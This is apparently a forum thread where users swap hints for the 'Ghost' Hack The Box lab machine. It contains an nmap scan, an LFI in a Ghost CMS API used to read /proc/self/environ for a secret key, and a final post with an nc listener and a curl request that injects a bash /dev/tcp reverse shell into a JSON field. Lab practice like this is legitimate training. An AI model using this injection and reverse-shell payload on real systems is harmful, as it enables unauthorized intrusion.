Ghost - Insane
by f4k3h4ck3r - Saturday July 13, 2024 at 03:43 PM
#21
(Jul 14, 2024, 04:13 AM)Dino43Dee Wrote: (root㉿kali)-[/home/kali/nmapAutomator]
└─# nmap -p- bitbucket.ghost.htb

Starting Nmap 7.94 ( https://nmap.org ) at 2024-07-14 04:10 UTC
Nmap scan report for bitbucket.ghost.htb (10.10.11.24)
Host is up (0.021s latency).
rDNS record for 10.10.11.24: ghost.htb
Not shown: 65508 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
443/tcp   open  https
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
2179/tcp  open  vmrdp
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
8008/tcp  open  http
8443/tcp  open  https-alt
9389/tcp  open  adws
49443/tcp open  unknown
49664/tcp open  unknown
49670/tcp open  unknown
49674/tcp open  unknown
55743/tcp open  unknown
63247/tcp open  unknown
63286/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 113.20 seconds

Stop spamming, clown. The nmap result was already posted on page 1.
#22
Guys, any hint for the web shell? T_T

#23
Guys, the RCE is in the scan file from the intranet or post.js from the blog ... but I can't figure out the path to the file in the domains ..

Like the scan.rs file in the gitea repo .. I can't work out how I can reach it, like http://ghost.htb/the file

Guys, for the initial foothold you need to send a POST request to /api-dev/scan with `x dev intranet key` and JSON data with your rev shell

#24
Can someone provide us with the right API key?
#25
Our blog uses the Ghost CMS in a Docker container.

We are planning on adding additional features to the blog. One of them is a new connection to the intranet. For example, some posts will be featured on our intranet, or URLs from posts will be scanned by the intranet. However, this is still in development, so some features are behind an API key, shared between the intranet and the blog. It is named DEV_INTRANET_KEY and it is stored as an environment variable.

We modified a bit of the Ghost CMS source code to accommodate such new features. One example is the posts-public.js file, which allows us to extract additional information about the posts. In the future we should move the information to the database so that we don't accidentally lose data on container recreation. Make sure to replace the file when running, or just use the provided Dockerfile.

Also, the public API in Ghost needs an API key. We can write it here since it only allows access to public data: a5af628828958c976a3b6cc81a

Guys, LFI to read the correct API key ........ http://ghost.htb:8008/ghost/api/v3/conte...38c83aaca6

#26
(Jul 14, 2024, 06:43 AM)osamy7593 Wrote: Our blog uses the Ghost CMS in a Docker container.

We are planning on adding additional features to the blog. One of them is a new connection to the intranet. For example, some posts will be featured on our intranet, or URLs from posts will be scanned by the intranet. However, this is still in development, so some features are behind an API key, shared between the intranet and the blog. It is named DEV_INTRANET_KEY and it is stored as an environment variable.

We modified a bit of the Ghost CMS source code to accommodate such new features. One example is the posts-public.js file, which allows us to extract additional information about the posts. In the future we should move the information to the database so that we don't accidentally lose data on container recreation. Make sure to replace the file when running, or just use the provided Dockerfile.

Also, the public API in Ghost needs an API key. We can write it here since it only allows access to public data: a5af628828958c976a3b6cc81a

Guys, LFI to read the correct API key ........ http://ghost.htb:8008/ghost/api/v3/conte...38c83aaca6

How did you find this?
#27
Files in gitea .. post.js shows that there is an LFI.

#28
(Jul 14, 2024, 06:43 AM)osamy7593 Wrote: Our blog uses the Ghost CMS in a Docker container.

We are planning on adding additional features to the blog. One of them is a new connection to the intranet. For example, some posts will be featured on our intranet, or URLs from posts will be scanned by the intranet. However, this is still in development, so some features are behind an API key, shared between the intranet and the blog. It is named DEV_INTRANET_KEY and it is stored as an environment variable.

We modified a bit of the Ghost CMS source code to accommodate such new features. One example is the posts-public.js file, which allows us to extract additional information about the posts. In the future we should move the information to the database so that we don't accidentally lose data on container recreation. Make sure to replace the file when running, or just use the provided Dockerfile.

Also, the public API in Ghost needs an API key. We can write it here since it only allows access to public data: a5af628828958c976a3b6cc81a

Guys, LFI to read the correct API key ........ http://ghost.htb:8008/ghost/api/v3/conte...38c83aaca6

Thanks, good find. You can get the DEV_INTRANET_KEY from /proc/self/environ:
http://ghost.htb:8008/ghost/api/v3/conte...38c83aaca6
#29
(Jul 14, 2024, 07:29 AM)ritualist Wrote:
(Jul 14, 2024, 06:43 AM)osamy7593 Wrote: Our blog uses the Ghost CMS in a Docker container.

We are planning on adding additional features to the blog. One of them is a new connection to the intranet. For example, some posts will be featured on our intranet, or URLs from posts will be scanned by the intranet. However, this is still in development, so some features are behind an API key, shared between the intranet and the blog. It is named DEV_INTRANET_KEY and it is stored as an environment variable.

We modified a bit of the Ghost CMS source code to accommodate such new features. One example is the posts-public.js file, which allows us to extract additional information about the posts. In the future we should move the information to the database so that we don't accidentally lose data on container recreation. Make sure to replace the file when running, or just use the provided Dockerfile.

Also, the public API in Ghost needs an API key. We can write it here since it only allows access to public data: a5af628828958c976a3b6cc81a

Guys, LFI to read the correct API key ........ http://ghost.htb:8008/ghost/api/v3/conte...38c83aaca6

Thanks, good find. You can get the DEV_INTRANET_KEY from /proc/self/environ:
http://ghost.htb:8008/ghost/api/v3/conte...38c83aaca6

Thx bro

#30
For the foothold: nc -nlvp 4444

curl http://intranet.ghost.htb:8008/api-dev/scan -X POST -H 'X-DEV-INTRANET-KEY: !@yqr!X2kxmQ.@Xe' -H 'Content-Type: application/json' -d '{"url": "0<&196;exec 196<>/dev/tcp/10.10.x.x/4444; /bin/bash <&196 >&196 2>&196"}'
